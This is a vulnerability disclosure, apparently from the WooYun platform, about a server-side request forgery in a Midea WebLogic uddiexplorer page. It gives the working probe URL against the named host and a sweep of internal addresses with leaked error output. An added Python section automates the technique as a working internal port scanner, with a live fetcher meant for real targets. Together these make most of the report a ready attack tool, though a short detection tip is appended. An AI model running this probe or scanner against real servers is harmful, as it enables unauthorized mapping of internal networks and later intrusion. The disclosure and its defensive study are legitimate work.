Vulnerability summary
Followers: 24
Title: SSRF on a Midea site allows probing the internal network
Submitted: 2015-10-06 09:16
Fixed: 2015-11-21 19:36
Published: 2015-11-21 19:36
Type: design flaw / logic error
Severity: high
Self-assessed Rank: 12
Status: confirmed by vendor
Tags: none
Disclosure timeline:
2015-10-06: details sent to the vendor, awaiting vendor action
2015-10-07: vendor confirmed; details visible to the vendor only
2015-10-17: details opened to core white hats and domain experts
2015-10-27: details opened to regular white hats
2015-11-06: details opened to intern white hats
2015-11-21: details opened to the public
Brief description: Midea is a responsive, good vendor, haha.
Details:
The `operator` parameter of the WebLogic uddiexplorer page SearchPublicRegistries.jsp is fetched server-side, so pointing it at an internal address makes the WebLogic host open the connection on the attacker's behalf (here to 172.16.16.49:22):
http://ccs.midea.com.cn:8081/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.49:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
/24 sweep (results as reported; "closed" marks hosts where the server-side connection failed, the SOAP client's error text otherwise reveals what answered):
http://172.16.16.1/ closed
http://172.16.16.2/ closed
http://172.16.16.3/ closed
http://172.16.16.8/ weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://172.16.16.8/ returned a 500 error code (Internal Server Error). Please ensure that your URL is correct, and the web service has deployed.
http://172.16.16.16/ closed
http://172.16.16.17/ closed
http://172.16.16.18/ closed
http://172.16.16.19/ weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.16.16.19/ which did not have a valid SOAP content-type: text/html;charset=GBK.
http://172.16.16.21/ weblogic.uddi.client.structures.exception.XML_SoapException: Connection reset
http://172.16.16.22/ weblogic.uddi.client.structures.exception.XML_SoapException: Connection reset
http://172.16.16.23/ weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.16.16.23/ which did not have a valid SOAP content-type: text/html;charset=GBK.
http://172.16.16.24/
http://172.16.16.25/ closed
http://172.16.16.26/ closed
http://172.16.16.27/ closed
http://172.16.16.29/ weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.16.16.29/ which did not have a valid SOAP content-type: null.
http://172.16.16.38/ weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.16.16.38/ which did not have a valid SOAP content-type: text/html.
Proof of vulnerability (probe of 172.16.16.49:25; the missing Content-Type shows a non-HTTP service, consistent with SMTP, accepted the connection):
An error has occurred weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.16.16.49:25 which did not have a valid SOAP content-type: null.
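The sweep above is a manual version of a standard SSRF port scan: the `operator` URL is fetched by WebLogic's UDDI SOAP client, and the exception text it renders back differs by what was listening. The following is an added example, not code from the report or from Midea, that automates the reporter's technique. The classifier keys on the exact phrases quoted in the report ("returned a 500 error code", "did not have a valid SOAP content-type: …", "Connection reset"); the "could not connect" wording used for a refused connection, the sample responses, and the `fetch` plumbing are assumptions constructed for the example.

```python
"""SSRF port-probe helper for WebLogic uddiexplorer SearchPublicRegistries.jsp.

Added example (not from the original report). It points `operator` at an
internal host:port and maps the SOAP client's error text to a port state.
"""
from typing import Callable, Dict, Iterable
from urllib.parse import parse_qs, urlencode, urlparse
import urllib.request

SOAP_EXC = "weblogic.uddi.client.structures.exception.XML_SoapException"


def build_probe_url(base: str, host: str, port: int) -> str:
    """Build the probe URL; `base` is the uddiexplorer directory URL.

    The other parameters are copied from the request in the report; only
    `operator` matters for the SSRF."""
    params = {
        "operator": f"http://{host}:{port}",
        "rdoSearch": "name",
        "txtSearchname": "sdf",
        "txtSearchkey": "",
        "txtSearchfor": "",
        "selfor": "Businesslocation",
        "btnSubmit": "Search",
    }
    return f"{base.rstrip('/')}/SearchPublicRegistries.jsp?{urlencode(params)}"


def classify(body: str) -> str:
    """Map the rendered XML_SoapException text to a port state.

    Order matters: the 'content-type: null' case must be tested before the
    generic content-type case."""
    if "returned a 500 error code" in body:
        return "open/http"        # an HTTP server answered the SOAP POST with 500
    if "did not have a valid SOAP content-type: null" in body:
        return "open/non-http"    # something answered but sent no Content-Type (e.g. SMTP on :25)
    if "did not have a valid SOAP content-type" in body:
        return "open/http"        # HTTP server returning a non-SOAP type such as text/html
    if "Connection reset" in body:
        return "open/reset"       # a listener accepted the TCP connection, then dropped it
    if "could not connect" in body:   # assumed wording for a refused/filtered port
        return "closed"
    if SOAP_EXC in body:
        return "open/unknown"     # some other SOAP client error: treat as reachable
    return "unknown"              # no exception rendered at all; inspect manually


def scan(base: str, net: str, last_octets: Iterable[int], port: int,
         fetch: Callable[[str], str]) -> Dict[str, str]:
    """Probe net.X:port for each X and return {host: state}."""
    results: Dict[str, str] = {}
    for x in last_octets:
        host = f"{net}.{x}"
        results[host] = classify(fetch(build_probe_url(base, host, port)))
    return results


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Live fetcher (only used when running against a real target)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:  # noqa: S310
        return resp.read().decode("utf-8", "replace")


# Constructed offline responses modelled on the messages quoted in the report.
DEMO_BASE = "http://ccs.midea.com.cn:8081/uddiexplorer"
DEMO_RESPONSES = {
    "172.16.16.1": f"An error has occurred {SOAP_EXC}: Tried all: '1' addresses, "
                   "but could not connect over HTTP to server: '172.16.16.1', port: '80'",  # assumed wording
    "172.16.16.8": f"An error has occurred {SOAP_EXC}: The server at http://172.16.16.8/ "
                   "returned a 500 error code (Internal Server Error).",
    "172.16.16.19": f"An error has occurred {SOAP_EXC}: Received a response from url: "
                    "http://172.16.16.19/ which did not have a valid SOAP content-type: text/html;charset=GBK.",
    "172.16.16.21": f"An error has occurred {SOAP_EXC}: Connection reset",
    "172.16.16.29": f"An error has occurred {SOAP_EXC}: Received a response from url: "
                    "http://172.16.16.29/ which did not have a valid SOAP content-type: null.",
}


def demo_fetch(url: str) -> str:
    """Offline stand-in for http_fetch(): look up the probed host from `operator`."""
    operator = parse_qs(urlparse(url).query)["operator"][0]
    return DEMO_RESPONSES[urlparse(operator).hostname]


def demo() -> Dict[str, str]:
    """Run the sweep against the constructed responses."""
    return scan(DEMO_BASE, "172.16.16", [1, 8, 19, 21, 29], 80, demo_fetch)


if __name__ == "__main__":
    for host, state in demo().items():
        print(f"{host:<14} {state}")
```

Replace `demo_fetch` with `http_fetch` to run against a real, authorized target. On the defensive side the same phrases are the detection signal: any request to SearchPublicRegistries.jsp whose `operator` parameter carries a private address is an SSRF probe, and the rendered XML_SoapException text is what leaks the internal host's state back to the requester.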
Fix recommendation: (none given)
Vendor response
Severity (vendor-assessed): medium
Rank: 8
Confirmed: 2015-10-07 19:35
Vendor reply: Thanks to WooYun white hat @jianFen (减分? 简芬? 捡粪? (-。-;) can't bear to look) for the heads-up; we'll keep summoning the application admins to put out the fire.
Latest status: none